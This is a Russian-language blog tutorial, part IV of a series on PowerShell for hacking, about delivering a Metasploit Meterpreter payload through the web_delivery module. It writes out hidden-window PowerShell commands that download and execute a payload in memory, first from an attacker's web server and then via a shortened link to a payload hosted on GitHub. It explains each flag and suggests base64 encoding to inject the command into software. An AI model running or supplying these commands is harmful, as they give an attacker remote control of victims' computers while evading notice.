PowerShell для хакера. Часть IV. Web Delivery - доставка полезной нагрузки через Web

PowerShell для хакера. Часть IV. Web Delivery - доставка полезной нагрузки через Web


Часть 4

Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я стараюсь в своих статьях придерживаться связки PowerShell Metasploit. И в этой статье я также буду демонстрировать технику доставки полезной нагрузки для получение метерпретер сессии в метасплоите. И так давайте начнем.

Прежде чем начну,хочу заметить что мой скрипт Power_Meter,который я использовал в прошлых статьях так же работает по принципу веб деливери.

Для начала давайте посмотрим как это работает:

Запустим метасплоит,поищим по ключевому слову web_delivery



Посмотрим описания эксплойта:



Из описания узнаем для себя базовые опции,кем написан был еще в 2013 году и сплойт этот работает на платформах где есть или Python или PHP или PowerShell, ну мы же конечно посмотрим его на примере с PowerShell. Так же видим в описании что при запуске стартует простенький вебсервер который хранит на себе полезную нагрузку и генерирует команду для запуска этой полезной нагрузки в зависимости от языка программирования которые мы выберем командой set target

Ну что же , давайте зададим необходимые параметры и запустим наш эксплоит.

Как видим у нас поднялся простенький веб сервер с полезной нагрузкой по адресу:

http://192.168.0.103:8080/hack

и выдал нам на вывод команду для подгрузки этой полезной нагрузки:

powershell.exe -nop -w hidden -c $h=new-object net.webclient;$h.proxy=[Net.WebRequest]::GetSystemWebProxy();$h.Proxy.Credentials=[Net.CredentialCache]:: DefaultCredentials;IEX $h.downloadstring('http://192.168.0.103:8080/hack');

Что же,для демонстрации просто запустим данную команду на стороне жертвы:

Как видим все тривиально просто) Команда подгрузила полезную нагрузку из удаленного веб сервера)

Но зачем нам каждый раз поднимать веб сервер для хранение полезной нагрузки?

Давайте положим полезную нагрузку где то на гитхабе.

Сперва сначала давайте скачаем содержимое нагрузки:

Скопируем содержимое полезной нагрузки и разместим где то на гитхабе и сократим ссылку через сервис сокращение ссылок:

Затем,мы уже поняли как работает принцип веб деливер используем следующую команду для компрометации жертвы:

powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).downloadstring('http://bit.ly/2hwONZn');

-w hidden (window hidden ) -- скрыть окно запуска

-NoP (No Profile) -- не использовать профиль PowerShell

IEX (New-Object Net.WebClient).downloadstring('http://bit.ly/2hwONZn'); -- загрузить и запустить в памяти контент который находится по ссылке

Как видим команда намного короче а результат тот же

Для удобства и инжекта в какое то ПО можно перегнать в base64 формат нашу команду)

Как видим результат тот же)

В общем на этом пока все) Надеюсь смысл техники доставки полезной нагрузки более менее понятен)

Если возникнут трудности - задавайте вопросы в комментариях - постараюсь ответить)


Всем спасибо) Если понравилась статья - жмакни лайк )!